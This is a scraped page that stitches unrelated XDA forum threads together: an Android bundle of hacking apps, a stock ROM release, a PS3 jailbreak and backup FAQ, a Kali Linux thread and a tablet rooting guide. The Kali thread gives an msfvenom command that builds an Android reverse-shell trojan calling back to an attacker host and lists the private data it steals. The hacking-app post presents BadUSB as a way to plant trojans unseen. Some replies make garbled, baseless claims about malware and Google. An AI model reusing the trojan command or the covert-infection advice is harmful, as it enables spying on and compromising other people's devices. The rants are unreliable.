PenTesters_Paradise
Code:
[b][center]DISCLAMER[/center][/b]
I can not be held responsible for how you use this package.
I am also not to be held responsible if flashing this package
damages your device in anyway. This package is for
educational use only and should not be taken lightly. This is
the exact package that I use for my 2nd job, and is not meant
to just be played with willy nilly. Ask permission before doing
anything in public OR private.
PenTesters_ParadiseThis package was originally supposed to be a custom ROM, but I wanted to give everyone an equal opportunity to enjoy this package, so I converted it to something everyone can use! This package isn't for the faint of heart. This is for those of you curious about Pen Testing and for those who basically want to feel like they're bringing Watch_Dogs to the real world. Below I will explain the package, and what each item can actually do. I will also have YouTube videos (when I get the time to record them) explaining each app and package. I also have some custom content coming, some that will be shown off and not released as well. Please enjoy and remember to play it safe and always ask permission first before using any of these packages or tweaks.
What's A Pen Tester?If you're asking yourself this question, this package MIGHT NOT be for you. A Pen Tester is either a White Hat or Grey Hat hacker that gets hired by individuals or companies to basically purposely hack their products, networks, or any other sorts of electronically based applications. Pen Testers are becoming a big deal especially in the Gaming world. Dev companies are starting to get smart and are realizing that they honestly can't BEAT the hackers with out TRUE HACKERS of their own. This is slowly becoming a big money life style and more and more people want into it. This is basically your "License to Kill" when it comes to a product/project/ect. when the company or individual gives you the green light to crack in and have at it.
Package Includes
Screen Shots will be added to the 3rd post of this thread, tutorials for each app and the change log to the 2nd
AnDOSid
This app is an Android-based DOS attacker. Basically, this app allows you to simulate a DOS attack (Denial of Service) as a HTTP POST flood attack on either another person or a web server.
NetSpoofer
Network Spoofer lets you change websites on other people’s computers from an Android phone. Simply log onto a Wifi network, choose a spoof to use and press start. This can be a lot of fun, but always ask first.
AndroidVNC
please see this thread for all the info about this
http://forum.xda-developers.com/showthread.php?t=497187
aWPScan
This app lets you scan wordpress based sites for exploitable entrances to the sites admin panel. Fairly simple to use and can sometimes come in handy when working for a client and building them a WP based site.
DroidSheep and FaceNiff
These apps were popular for a very short time but are very powerful. They both kind of have the same functions as they work as a MITM (Man In The Middle) attacker service. Basically, login to any WiFi hot spot, and you will start capturing web traffic. You can manipulate the web traffic to do as you want from here.
DroidSheep Guard
This app guards you from anyone else using Droid Sheep. I'm not entirely sure if it will guard against FaceNiff as well.
DriveDroid
This app turns your device basically into a disc image mounting device. Basically, you can take an ISO or IMG file, mount it with this app, and install full operating systems to another PC. Read below on how to work it with the Galaxy S5 Specifically, as there's 1 special step you need to know
1.) Run the app and go through the setup.
2.) When you get to the selection about selecting a driver, select the 3rd item, which should be a "Legacy USB Driver"
3.) When you get to the point abut TESTING it and restarting your PC, this is where the trick lies.
3a.) As your PC boots up, boot directly to your BIOS (for HP and ASUS its either Escape or F2. not sure about others off the top of my head)
4.) From here, make sure your phone as connected successfully in MTP mode.
4a.) Go into Drive Droid (After MTP has been set), and select the IMG or ISO you wish to emulate from your device.
4b.) In the BIOS, Save Settings and restart (I know you didn't change anything, hear me out)
5.) From here, you need to test...
5a.) You'll either (after the bios loading screen) boot directly to the ISO or IMG, or into your standard OS.
6.) If you boot directly to your standard OS, reattempt from step 3 onwards, but at step 5, go to 6a
6a.) When the PC restarts, bring up your Boot Menu of options (F12 I believe on ASUS and HP)
6b.) From here, select the Samsung device listed, and it should boot!
dSploit
dSploit is a package of all sorts of tools ranging from MITM attacks to DOS attacks, and other testing abilities. Plenty of videos around on how to use this app.
HackAppData
This is for any app on your device. This app lets you modify the AppData of any application installed on your device.
Hackers Keyboard
Just a highly customizable keyboard.
Network Mapper
This app simply maps out the WiFi Network you are currently connected to, showing you every device connected.
Shark
Basically WireShark for Android. Lets you see incoming and outgoing data packets from your device and other things on the network.
Penetrate Pro
No this isn't a dirty joke (couldn't resist), This app works with decoding WiFi connections to allow you to connect to locked and private connections.
SQLMap
SQLMap is one of the most highly used tools around for SQL Injection attacks as its basically the best automated tool for it. There's tons of tutorials out there about it and soon I'll post one of my own.
LockScreen Widgets Tweak
Created by BigBot96, this tweak lets you apply Widgets to your lock screen. PLEASE Make sure you download the correct file. Currently, only the NE9 builds are supported with this tweak, but I'll have an option available for you to not have to worry about this.
Coming Soon...
Future Additions will be coming around soon for this, so keep checking the thread!
Kali Linux NetHunter Features.
So far, only supported by the Nexus devices, I'm attempting to port over the apps and data for this to the S5 as the first non-Nexus device to have support for Kali Linux control. Below will be the list of what will be included.
KaliLauncher
This is the heart of the NetHunter features. This controls everything, and launches all the different exploits available through Kali Linux. To learn more, keep reading
BadUSB
BadUSB is a form of undetectable Malware that is applied to specific USB devices that match the exploit. Basically, this hijacks your USB plug while your device is connected to a computer (windows based), and lets you install a faulty driver to it that houses your malware files. You could use this to transfer things like BotNets, Trojans, and many other forms of malware to a users system and they'd never even know.
DNSSpoofer
Basically, this tool just spoofs the DNS connection you're using or the other person/s are using and lets you reroute people. DNS Attacks are few and far between, but they're slowly getting easier.
PowerSploit
I'll admit, I haven't read up on this yet, but when I have, I'll edit this lol.
NoUpStream
This stops any up stream data entirely.
Other Future Additions
Basically, I'd like to convert this to something like a "Mini-ROM" that gives you a Launcher, themed Gapps, themed system apps, and much more, but for now, this is the temp solution. Next Update should have at least a custom boot animation.
How-To Install1.) Transfer the Zip file that matches your device to your SD card or Internal Storage
2.) Boot up into recovery mode and Flash the ZIP
3.) Done!
Special thanks to the creators of all these apps, scripts and tweaks that are being applied to this package. The ZIP packages below simply just need to be flashed to your Android device via SafeStrap (only method I can test). If someone could test a standard TWRP on a Dev Edition or another unlocked device, that'd be awesome.
Download Links Below
UPLOADING NEW ONES AFTER THE NEXT FLASH Test.
Thought it was ready, and realized it wasn't.
All apps are force closing -_- I'll fix it when I wake up. I've been at it for 12 hours now
Planning on updating this/adding a download?
Nice waiting anxiously for this
Waiting like wagging dog.... I went to source and got working nice..like to wait for add ons.
http://forum.xda-developers.com/showthread.php?p=3518324
Subscribed.
Sent from my SM-G900V using Tapatalk
lol he posted this weeks ago.. he respondin in his rom thread also saying he was working on a new rom which isnt out yet and said a week or two ago that his tmo budfy got 5.0 lollipop which was false lol so not sure if and when this will actually be uploaded.. its been here for weeks with no zip or apks at all in the themes n apps section..
most of these apks are stuff you can manually install if you dont want to wait :-/
Reinventing the wheel
Kali nethunter had been out for a while for the S5 variants, it's like having a VM copy of Kali on your galaxy S5 the instructions/apps/kernel are all available
http://forum.xda-developers.com/galaxy-s5/unified-development/kali-nethunter-galaxy-s5-t3298477 all the other apps he's taking about are available just search on Google or download a app called bugdroid pro from the app store it provides downloads and installs for all of these.
Faceniff
Droid sheep
I don't think those function anymore on anything.. on pretty sure those security holes they exploit have been patched..
dmayniak said:
Kali nethunter had been out for a while for the S5 variants, it's like having a VM copy of Kali on your galaxy S5 the instructions/apps/kernel are all available
http://forum.xda-developers.com/galaxy-s5/unified-development/kali-nethunter-galaxy-s5-t3298477 all the other apps he's taking about are available just search on Google or download a app called bugdroid pro from the app store it provides downloads and installs for all of these.
Faceniff
Droid sheep
I don't think those function anymore on anything.. on pretty sure those security holes they exploit have been patched..
Click to expand...
Click to collapse
lol the last comment was me about 2 years ago
elliwigy said:
lol the last comment was me about 2 years ago
Click to expand...
Click to collapse
i know right? lol i gave up on this because at the time i sucked at making flashable zip's
Vortell said:
It would be cool if you started it back up!
Click to expand...
Click to collapse
The reason I haven't is because Kali Linux has an official release for this phone as long as your bootloader is unlocked and you're on CM
Related
Here I provide a half legal (I included the HTC drivers for the hardware...) stock AOSP (android-1.5_r3) ROM!
You can add Google Apps legally if you have bought a Google experienced phone by running this script on a linux-machine:
http://forum.xda-developers.com/showthread.php?t=564744
Features:
-No special features
-Just stock w/o Google apps
Download for G1:
http://www.4shared.com/file/135524283/e812c64f/dream.html
Instructions:
Unzip the file, then:
fastboot erase userdata
fastboot flash system system.img
fastboot flash boot boot.img
fastboot reboot
To Do:
I'm a lazy guy.
Next release will be cyanogenmod w/o googleapps.
Well does the rom working without all googles stuffs ?
Can we add them easily ?
Thanks for the new build, hope this googles' issue will be fine
It does work, but it's nearly useless.
I work on a windows version of my script which adds google apps legally.
I also will create a script for recovery.
I'll work on this ROM when I'm done with these, as soon as the scripts are ready, this ROM will get some goodies from Cyan.
Nice work Maxisma!
Its a good start
awesome bro
keep it up it's a start!
maxisma said:
It does work, but it's nearly useless.
I work on a windows version of my script which adds google apps legally.
I also will create a script for recovery.
I'll work on this ROM when I'm done with these, as soon as the scripts are ready, this ROM will get some goodies from Cyan.
Click to expand...
Click to collapse
Excellent.
With all this doom and gloom.
Surely this is the problem solved?
But what do you mean by google experience?
I know I got all the apps with my phone... T-Mobile G1...
Google Experience are all phones with Google Apps preinstalled.
Just some indian and russian HTC devices don't have it.
Out of interest would this boot fine without running the script?
I am presuming not, but i am just curious?
I would try it out, but at the moment I am not at home and only have 2g coverage on my phone so its a bit slow to download
Edit //
Could i (in theroy) install, boot and then use wget to download sam3 from slideme.org and then download a third party dialer / K9 etc... etc..
So use all third party apps
vixsandlee said:
Out of interest would this boot fine without running the script?
I am presuming not, but i am just curious?
I would try it out, but at the moment I am not at home and only have 2g coverage on my phone so its a bit slow to download
Click to expand...
Click to collapse
It boot's fine w/o the script ;-)
Not to rain on your parade, but ....
Hi Maxisma,
Not to rain on the parade, but ...
Per Google, this ROM is no more "legal" than any other ...
The following is taken from http://source.android.com/documentation/building-for-dream
* The Dream device software contains some proprietary binaries. For contractual reasons, these cannot be redistributed separately from the shipping hardware, but the provided script may be used to extract these binaries from your development device so that they can be correctly included in your build. These libraries include the openGL|ES library, the Qualcomm camera library, the HTC Radio Interface Library, etc. You need adb to be in your path, and you need your device to be configured for adb access. If you don't have adb already, do a generic build first, which will put it in your path.
Click to expand...
Click to collapse
Just my understanding of things.
~enom~
Interesting, i am going to have to have a look and a play later.
Cheers for the work (forgot to say that in my first post)
if you're interested on maybe trying to do this on your own:
http://www.johandekoning.nl/index.php/2009/06/07/building-android-15-build-environment/
Contrary to what you might think, a room w/o google apps is not entirely useless. Probably the major setbacks are the lack of market access, the lack of a YouTube player (we need to work on a port of Totem's Youtube implementation but for android), and a way to manage contacts (irrenhaus is looking at the posibility of setting up a Google Contacts sync), plus we'd probably need to write an utility to actually read/write contacts to and from SIM.
G-mail, you can acess from the browser (which, AFAIK, is still free and open source under the Apache Licence), Maps can be downloaded once we get Market access.
Other than that, a bone-stock android build will keep you connected to the internet, allow you to tether, allow you to run scripts, deliver your mms, give you camera and music player, have theme support, and ofcourse, make phone calls just like any other build will. You'll just have to go a bit off of your way to get apps, but again, that's the main drive here, either get acess to market of create a new one and invite app developers to submit their apps there too
enomther said:
Hi Maxisma,
Not to rain on the parade, but ...
Per Google, this ROM is no more "legal" than any other ...
The following is taken from http://source.android.com/documentation/building-for-dream
Just my understanding of things.
~enom~
Click to expand...
Click to collapse
That's dead on too, and I forgot about it. The issue would not be with google anymore though, but with HTC and it's hardware partners. This is what cyanogen realized, now that the spotlight is on rom development, companies will have watchdogs for re-distribution of binary code. If you own an ADP device, you can legally download the binaries from the HTC website and MAKE YOUR OWN BUILD (so redistribution targeting dream is out, unless we can talk to HTC about it), either that, or, as I've said before, move onto an open hardware platform so we can write our own drivers.
---edit---
By the way, I still don't agree with the whole feeling of gloom floating around here. This is only a change to the way we're doing things right now, but it doesn't hinder development in any way. If you're the kind of dev that's here for the praise, then yeah, you wont like it that now people will have to actually know what they're doing, so your fanbase will be reduced. I for one welcome the change. This rom, for example, can still be distributed without the HTC binaries and maybe have instructions for the user to download them, install them in their OTA package, and the actually flash the rom. But then that requires that people actually know what they're doing, since we can't legally provide them the finished product.
Also, it doesn't hinder improvement of the platform. None, I repeat, NONE of cyanogen's or other dev's work ever even touched the proprietary parts of the build, as this is nearly impossible without the source (I know, baksmali, but really, I'm trying to make a point here!...) and most of what made his work awesome was the behind-the-userland work; kernel's bfs patches, scripting, cpu time management, modifications to available source, for example, the settings package.
We can still improve the platform, we can contribute, and maybe this time around the way Google wanted people to, by submitting code for their consideration to have it maybe implemented in android's next build.
I'll be glad to see all the "OMG, MY PHONE WONT START" threads diminish as people realize that this will no longer be the place where you get it all dumbed down and easy to use.
hey just by simple curiosity, how do you then log into the phone, if this rom is google less? I presume you still need a google account to set up your machine right????
kmassada said:
hey just by simple curiosity, how do you then log into the phone, if this rom is google less? I presume you still need a google account to set up your machine right????
Click to expand...
Click to collapse
You don't need to login as there is no setupwizard.
jubeh said:
That's dead on too, and I forgot about it. The issue would not be with google anymore though, but with HTC and it's hardware partners. This is what cyanogen realized, now that the spotlight is on rom development, companies will have watchdogs for re-distribution of binary code. If you own an ADP device, you can legally download the binaries from the HTC website and MAKE YOUR OWN BUILD (so redistribution targeting dream is out, unless we can talk to HTC about it), either that, or, as I've said before, move onto an open hardware platform so we can write our own drivers.
---edit---
By the way, I still don't agree with the whole feeling of gloom floating around here. This is only a change to the way we're doing things right now, but it doesn't hinder development in any way. If you're the kind of dev that's here for the praise, then yeah, you wont like it that now people will have to actually know what they're doing, so your fanbase will be reduced. I for one welcome the change. This rom, for example, can still be distributed without the HTC binaries and maybe have instructions for the user to download them, install them in their OTA package, and the actually flash the rom. But then that requires that people actually know what they're doing, since we can't legally provide them the finished product.
Also, it doesn't hinder improvement of the platform. None, I repeat, NONE of cyanogen's or other dev's work ever even touched the proprietary parts of the build, as this is nearly impossible without the source (I know, baksmali, but really, I'm trying to make a point here!...) and most of what made his work awesome was the behind-the-userland work; kernel's bfs patches, scripting, cpu time management, modifications to available source, for example, the settings package.
We can still improve the platform, we can contribute, and maybe this time around the way Google wanted people to, by submitting code for their consideration to have it maybe implemented in android's next build.
I'll be glad to see all the "OMG, MY PHONE WONT START" threads diminish as people realize that this will no longer be the place where you get it all dumbed down and easy to use.
Click to expand...
Click to collapse
I could probably write a Java application that would allow the user to:
1) hook their google phone up over USB and grab the existing google apps off of it
2) point to the location of their proprietary drivers on a manufacturers website for download
3) point to a central location of legal ROMS for download
4) click an ASSEMBLE button to put it all together. The resulting update file would be like they have always been, but no illegal redistribution has taken place.
One little problem ...
Ohsaka said:
I could probably write a Java application that would allow the user to:
1) hook their google phone up over USB and grab the existing google apps off of it
2) point to the location of their proprietary drivers on a manufacturers website for download
3) point to a central location of legal ROMS for download
4) click an ASSEMBLE button to put it all together. The resulting update file would be like they have always been, but no illegal redistribution has taken place.
Click to expand...
Click to collapse
Hi Ohsaka,
One little problem with that is ... the manufacturers do not post the drivers (standalone) on their websites for download, they only redist with the hardware. Also, there are other library files as well, it's not only drivers.
~enom~
Simple fix.. just don't include it. People will have to "magically" find the drivers on their own.
If it boots, why is it nearly useless?
EDIT 2 (6/09/2010):
Success at last!!!
Now confirmed working on numerous devices
Check http://psfreedom.com/wiki/index.php?title=Device_compatibility_list for compatibility.
Check http://www.github.com/psfreedom for source
DESIRE INSTALLATION INSTRUCTIONS
http://psfreedom.com/wiki/index.php?title=OpenDesire4.0.4
N1 INSTALLATION INSTRUCTIONS
http://psfreedom.com/wiki/index.php?title=Nexus_One
HTC DREAM/G1/Magic INSTALLATION INSTRUCTIONS
http://psfreedom.com/wiki/index.php?title=G1
HTC SAPPHIRE INSTALLATION INSTRUCTIONS
http://psfreedom.com/wiki/index.php?title=Magic32A
HTC EVO INSTALLATION INSTRUCTIONS
http://github.com/kakaroto/PSFreedom (NO BINARY AVAILABLE YET BUT THIS DOES WORK)
HTC WILDFIRE INSTALLATION INSTRUCTIONS
http://www.ps3underground.net/esclusiva-port-del-psfreedom-su-htc-wildfire/
HTC HD2 (ANDROID PORT) INSTALLATION INSTRUCTIONS
http://bit.ly/bPZf0C
Other MSM72K devices among numerous others are still being worked on. If you can in any way help please join #psfreedom on IRC.FREENODE.NET (By help I mean if you are a kernel developer or think you can offer some form of useful assistance, asking for status updates may get you kicked off the channel).
HSUSB Devices (Check the compatibility list) have not yet begun development. We are searching for a HSUSB developer to assist in the project, please join #psfreedom on irc.freenode.net if you are.
FAQ
Q: What is all this about hacking the PS3?
A: A few weeks ago, someone released a USB tool that allows you to switch any PS3 into "dev" or "debug" mode. The long and short of this means that the PS3 has finally been hacked and homebrew is a real possibility. After a lot of clever reverse engineering, the hack was documented and distributed under the name "PS3Groove". Some clever people ported that code so that other USB devices could be used for this purpose. It just so happens that your smartphone is also a USB device and this was a project to port THAT code so that your Android smartphone could be used to hack your PS3.
Q: Cool! Where do I start?
A: Slow down there, cowboy. This is pretty technical stuff, if you've come here from another forum, or are unfamilliar with terms like "recovery", "flashing", "rooting" and such, take a deep breath and look around the forums for more information, as any mistakes could brick your phone.
First, you'll need to know if your device is compatible. There is a list of android devices maintained here: http://psfreedom.com/wiki/index.php?...atibility_list
This will tell you if your device is supported, as well as point you to where to go if it is.
Q: Ok, so I have a supported device, now what?
A: Just owning the device isn't enough. You'll need to root it to enable you to install custom ROMs. Once you're confident about installing custom ROMs, you're ready to rock and roll! Now, this IS the Desire dev forum, so from here on I'll assume you have a HTC desire, rooted and ready to go. If you have a different device, refer to the link above, or look on your device's own forum.
Q: What ROMs are compatible with this?
A: If you thought that you might need a specific ROM - you'd be right! The whole hack revolves around the kernel that's loaded into the ROM. Essentially, this means that not all ROMs will be able to do this. Right now, if you're looking for an easy solution, install OpenDesire. CyanogenMOD may well work, too, as well as ROMs based off either of those, but no guarantees or promises are made.
Q: What about Sense ROMs?
A: Unfortunately, this isn't feasible. HTC Have yet to release the source code for Sense 2.2, which means we can't port this into it. So if you have a ROM that you like running sense, you'll have to make a choice - Sense, or PS3 hacking? There's no middle ground with this. Alternatively, you can just nandroid between the two ROMs, however you'll soon see how tedious this can get =P
Q: Ok I've got Open Desire installed, now what?
A: Opendesire by itself is just a damn good ROM, not a lean, mean, PS3-hacking machine, so you'll need to add something else. The details are kept here, but essentially there are two update zip files. One will "enable" the PS3 hack and one will "disable" it. You flash those files directly over the ROM itself, using your favourite recovery.
Q: BDMV or Homebrew?
A: In order to keep PSgroove away from Sony's legal team, they released it without the ability to play backup PS3 games, only PS3 homebrew (to which there is currently very little, but stay tuned!), they did this by disabling BDMV. So there are TWO "enable" files. One is "Homebrew", which is a direct port of the PSGroove code and will not play backup games and the other is "BDMV", which will play both PS3 homebrew AND backups.
Q: Did you say BACKUPS?!
A: Yer darn tootin' I did! Legal backups, of course. One of the few pieces of homebrew available is the Backup Manager. This is a simple application that will let you backup a GAME THAT YOU OWN onto an internal or external USB hard drive, then play it without the disk. You'll still need a disk in the drive, but any PS3 game will work.
Q: Where do I get Backup Manager?
A: Backup manager is built with the PS3 SDK, which means it's technically illegal software, so you wont find it on this site, but it really isn't hard to find with a bit of googling. Whatever you do, don't ask for it here!
Q: Hey guess what, I found a copy of backup manager, how do I use it?
A: Ok, so before you start, do yourself a checklist:
You'll need -
Rooted phone,
running a ROM with the PS3groove code loaded onto it (e.g. open desire with klutsh's enable zip flashed on top of it),
USB cable plugged into your PS3 going to the phone.
Phone switched on and on the home screen.
A PS3 running Firmware 3.41 (support for earlier Firmwares will come later, but don't ask when).
Make sure there's no disk in the drive.
Step 1: POWER OFF your PS3 COMPLETELY. This means flipping the switch off at the back of it (if it's a PHAT PS3) or UNPLUGGING it if it's a SLIM PS3.
Step 2: Switch it back on and IMMEDIATELY press the "disk eject button". When I say immediately, I mean it - you've got 0.2s to press it!
you'll notice your PS3 takes longer to boot, a few extra seconds. Once it has booted, you'll notice under GAME, you'll have a couple of extra options.
Step 3: Plug in your USB drive with manager.pkg on it, then select "* Install Package File". Select manager.pkg and it'll install, giving you a new Icon.
Step 4: Backup manager is now installed. Run it and put a disk in the drive. You'll see it appear in the list and it'll give you an option to back it up. It'll first ask if you want the external drive, then it'll ask if you want to install it to the Internal drive. More on that later.
Now, go make yourself a cup of tea. In fact, make several, Blu-ray disks are frickin' huge and take time to backup.
...................
Ok, so the game is backed up. Go ahead and put it back in it's box, where it'll be safe from harm. Now, get yourself ANOTHER PS3 game, any game at all and put it in the PS3. In backup manager, you'll see both your disk game and the backed up game. Select the backup game and press "X".
You'll now be kicked back to the XMB. But look at the disk icon. It should be showing you the game you backed up, NOT the game in your drive. You'll need a legit PS3 game in your drive for this to work, you'll also need to make sure you're running BDMV enable, or it wont work (it'll still show you the game in the drive).
Q: Sounds great! But what's the catch?
A: Actually, there are several. For one, the external hard drive must be FAT32, or it wont be detected by the PS3.
Because of this, any games that have files greater than 4Gb wont work (for example, God of War III), you'll need to install it onto the INTERNAL drive.
Even then, some games may not work at all. Luckily, there are a few lists showing which games work, which don't and which only work on the internal drive.
Oh and some games require you to delete all of their savegame data before they'll load. Sorry.
Furthermore, things like DLC, patches, etc. tend to not work, but this is very early days at the moment, so sit tight!
Q: What's this I hear about "stealth" backups?
A: Quite simply, everyone is expecting Sony to want to protect their precious PS3, which will likely come in the form of a banwave for anyone doing this. Make no mistake, do not assume for a second that you wont get banned for doing this. Still, some people believe that they might be safer if they use a "stealth" Backup Manager. This is simply a version of Backup Manager that tries to make it look like you're playing a different game, like MW2. So far, despite rumours to the contrary, Sony hasn't banned anyone yet, so nobody knows just how detectable it all is.
I'm hoping something comes of this, but I wouldn't get TOO excited, the developer of this is only 15 and while I'm sure he's quite talented, he's still quite young so it could take him a while, assuming it's possible at all.
Still, I like the guy, he makes no promises, doesn't pretend to be anything he isn't and makes it quite clear what he is and isn't capable of. He's essentially said "I'll give it a shot!" and that's good enough for me.
Sorry for the double post, but there's an update on this:
http://netzke.blogspot.com/
This guy is working on an Android port and, from what he's posted, he's not far off.
I sent the kid a donation, looks liek he already has the PSGroove part of the app working.
@ neoKushan, what does age have to do with anything? i know a few kids who are 15-18 who are smarter then half the people i have met on XDA, Including my self.
there is a version compiled for the n900. i have it and it works,would be good if someone could compile for desire? it is open source
abc27 said:
eavpsp is already working on this and we should offer him all the help that XDA has to offer.
Click to expand...
Click to collapse
He's been exposed as a fake, unfortunately. There's a story on the front page of ps3hax about it.
I'd donate to Netzke if I had some good hard evidence that he's genuine but so far I haven't seen anything.
Relikk said:
He's been exposed as a fake, unfortunately. There's a story on the front page of ps3hax about it.
I'd donate to Netzke if I had some good hard evidence that he's genuine but so far I haven't seen anything.
Click to expand...
Click to collapse
I'm aware. At the time I posted many people believed he had something genuine in store.
To be honest, porting over the N900 version mightn't be all that difficult.
Juggalo_X said:
I sent the kid a donation, looks liek he already has the PSGroove part of the app working.
@ neoKushan, what does age have to do with anything? i know a few kids who are 15-18 who are smarter then half the people i have met on XDA, Including my self.
Click to expand...
Click to collapse
I'm merely trying to point out that at 15, even if he's extremely talented, he's still quite inexperienced. From reading his twitter, he doesn't pretend otherwise. I completely support the guy and wish him well and by no means want to make it sound like he's a n00b or anything, I'm simply saying that he's young is all.
what does bring a jailbroken android to us?
cCeT said:
what does bring a jailbroken android to us?
Click to expand...
Click to collapse
It's not the android phone that's being jailbroken, it's the Playstation 3 being jailbroken through the use of an Android phone.
cCeT said:
what does bring a jailbroken android to us?
Click to expand...
Click to collapse
I believe this is actually a software clone of the PSjailbreak exploit which has been re-engineered to be run off of our Android devices. I.E., Put your Android phone in "PSjailbreak Mode" and then connect to PS3, it would then perform the same functionality that having the actual USB device/dongle would provide.
A marvell idea and one that I would love to try out once the tool reaches a stable version. I'm sure over the next week or so we'll see who can actually port it and who is just 'fronting'.
I'll be subscribing to this thread for sure!
**EDIT** Seems neo beat me to the answer!
I've uploaded the binary files used on the N900 so we can get to work on the Android port.
It comprises of a kernel module and two shell scripts.
If what the other guy who's doing the android port says is true, you don't need a special kernel or anything to do this, just root access. Who knows how true that is, though.
Would be nice to see some collaboration from some devs here who know what they're doing lol
if this happens then its gonna be awesome!!
Finally region free BR!!
Netzke is obviously a scammer looking for a quick buck... he mentions in every post that 15$ will get beta access.
Yes, it looks like scam at mee too.
Anyway, looking forward to get the N900 version ported to Android (someone on PSX Scene said we just need to compile the source for the kernel of our phone)
It does appear to be all that's needed. It's a portable kernel module according to the dev. He's releasing the source later today so we wait in earnest.
Make that source release tomorrow, depending on time zone.
Was pushed on line just before he went to bed.
As for netkaz, he's scamming, first claim was donations for a server.
I offered up a full server for free for the life of the project, no response, now he's going to start on a iPhone port after he can afford a iPhone.
eavpsp, well his own private chat room was leaked, he was getting other dev's to do all the work then planned to put his name to it.
The dev that is showing most promise at the minute is qberty1337
But as already said, once the n900 kernel module source is out it should not take too long.
The PSP porting effort is a farce to be honest. We just need that N900 source code and we can get going.
Klutsh said:
Make that source release tomorrow, depending on time zone.
Was pushed on line just before he went to bed.
As for netkaz, he's scamming, first claim was donations for a server.
I offered up a full server for free for the life of the project, no response, now he's going to start on a iPhone port after he can afford a iPhone.
eavpsp, well his own private chat room was leaked, he was getting other dev's to do all the work then planned to put his name to it.
The dev that is showing most promise at the minute is qberty1337
But as already said, once the n900 kernel module source is out it should not take too long.
Click to expand...
Click to collapse
thats good to hear
I hope someone is able to create a BR region free app for PS3 now!!
Code:
This is just for Educational Purpose nothing else .......
So while i was learning about Linux . I came to know that there is a distro of Linux called Kali Linux. Kali Linux basically has 300+ Hacking tools and has this
metasploit framework in it . Basically it will either create a Windows Trojan or an Android Trojan . I researched about it a bit and came to know that when you basically type in the following in the Terminal.
Code:
msfvenom androidmeterpreter/reverse_tcp LHOST=YOUR IP LPORT=ANY3/4DIGITS R > anyname.apk
This command makes it to compile a .apk with the payload and creates it.
When installed in a Android Device it is installed as MainActivity.apk
It can access a phone's Contacts, SMS logs , Call Logs , MICROPHONE , CAMERA !!! , Device Tree , Contents of the Device , Keylogs etc...
It is a light trojan ( not more than 0.3 MB ) and can run in background unnoticed . These Information of your devices are streamed to the hacker and compromises your security . So never download unknown APKS from the web .
In /system/app By default, haves an stock app called, DefaultContainer.apk (fixed)
All androed haves drm server and DefaultContainer.apk
Someday i think: "if a disable this app?"
Well, good question:
Answer is (When try to installing by brute force or PackageInstaller With disabled DefaultContainer.apk)
Result:
Unable to install package...
No exploits like this will be done in little time soon.
Sent from SomeFon
Either Google Inc., or AOSP must ensure that the exploit of this nature mustn't be happening in the future...
Can you post a link to the exploit's documentation on Metasploit? I'm running Kali on my MacBook and my Android tablet - and I don't see how that exploit is still open. Looks closed based on quite a few security & OS upgrades since it was found.
yawn... you might as well have titled this "Water found in ocean"
For starters android is awesome and very very flawed (like most 10/10 chicks you will ever meet) This has been a media circus for like 10 yrs now I think.... especially as of very recently we have all concluded that android isn't secure enough to order pizza online (seriously) Every few months theres a headline "huge vulnerabilty detected in Android patch unavailable but uhhh coming soon" (5 yrs later)
As for Kali its the succesor or second edition to Backtrack linux. These are distros specifically made for penetration testing. Basically its another tool for network security experts to assess the condition of a networks known vulnerabilities that haven't been patched yet. Using metasploit you are able to scan a network to find any unpatched bugs and then it will apply the exploit for you. Also I assure you it is much more complicated then typing one command into a box.... one day lol ohhh and those pentesting distros (backtrack is now retired) are nothing special... it is just a basic version of linux that comes preinstalled with a TON of basically security app you would ever want It is generally not recommended to run kali as your personal OS especially if your are teh noobcakes..
Don't use blackmart app.
This a dangerous malware masked as
Paralel market
DonT use ANY MARKET APP
TRY cut by BRUTEFORCE YOUR DEVICE and delete urgent all that is gogle's apps!!
These apps are sending randomic authenthic .jar files and .dex files, to execute these binaries from the cache folder of these damn "markets"
Jar files, and dex files, ACCORDING WITH THE ANDROED MASTER KEY,
May gain root, may destroy your GPU or simply your device does not boot anymore.
I tried continue to use blackmart app with locked cache folder.
The app refuses to start
The app NEEDS CACHE FOLDER FREE
For starting their CHEATS.
AN APP THAT ⱢDENY STARTS WHEN CACHE FOLDER IS LOCKED, IS A MALWARE!
the app curiously worked with locked cache after a few days, but, now is refuaing.
BE AWARE WITH ALL CHIT THAT GOGLE'S SICK AND THEIR PESTS SLAVES ARE DOING WITH YOU
.
Sent from Somefon
epic wow.... like just woah
tried continue to use blackmart app with locked cache folder.
The app refuses to start
Click to expand...
Click to collapse
This my friend was not an educated decision whatsoever ... "googles got the freakin kung fu grip on me nads so I guess I will just burn it all down" hmmm
I completely kinda mostly agree with what you posted about Google "which is government owned and operated now for some time... along with their butt buddies facebook.... My humble suggestion would be to (VERY CAREFULLY) learn how to root, unlock the bootloader and then install a custom rom like cyanogenmod on your cellphone. and yeah I would never ever recommend pirate Google play... just.... no!
But really it doesn't matter in the end... android is sooooooo filled with critical exploits..... I wouldn't lose any sleep over it.... ll and don't worry the same it will only get worse over time with Google and the bully things that bullies do.
The exploits borns on critical os, on where begun in a DAMN INC. NAMED AS GOOGLE, that DOES NOT RECOMENDS ROOT, BECAUSE THEY ARE ROOT.
i never seen a windows or unix-like os without root
Did you seen any Linux LAN vulnerable to "exploits"??
If yes, pass me the trick for hack the entire facebok and opera servers!
Sent from Somefon
Update (5/18/2019)
Since the first tool was released, HappyZ has improved many features so I think I can just refer to
* HappyZ's rooting guide: https://github.com/HappyZ/dpt-tools/wiki/The-Ultimate-Rooting-Guide
- The only thing I want to add as Windows user is (because the guide is for Mac/Linux users) it gets much easier if you use Linux terminal like cygwin, and the port name should be something like COM# where # can be found in Device Manager by comparing before/after you attach the device.
* HappyZ's upgrade guide: https://github.com/HappyZ/dpt-tools/wiki/The-Upgrade-Guide (Recommend to read this before/after you update the new firmware.)
You may donate a cup of coffee to him there Thanks to all others who contributed a lot.
--
Update (12/02/2018) -- These are outdated.
Finally we manage to root the device! Many thanks to all of your efforts.
Just refer to HappyZ's well written guide: https://github.com/HappyZ/dpt-tools
For whom have never used python like me (and probably using Windows):
(1) Install Python 3 and add it to PATH.
(2) Install MINGW64 and run scripts here instead of Powershell due to xxd issue if you are on Windows.
(2) pip httpsig pyserial on bash.
(3) Download HappyZ's dpt-tools and unzip.
(4* this issue is fixed by HappZ)
(5) Follow HappyZ's guide. You should execute dpt-tools.py in the folder you unzipped to use get-su-bin because of how the script is written.
Some suggestions after rooting (let me know if you have better ideas):
Here is my setup: install "E-ink Launcher" and "Multi action home button" using adb install.
Use adb shell am start -a android.intent.action.MAIN to change the main launcher to your launcher.
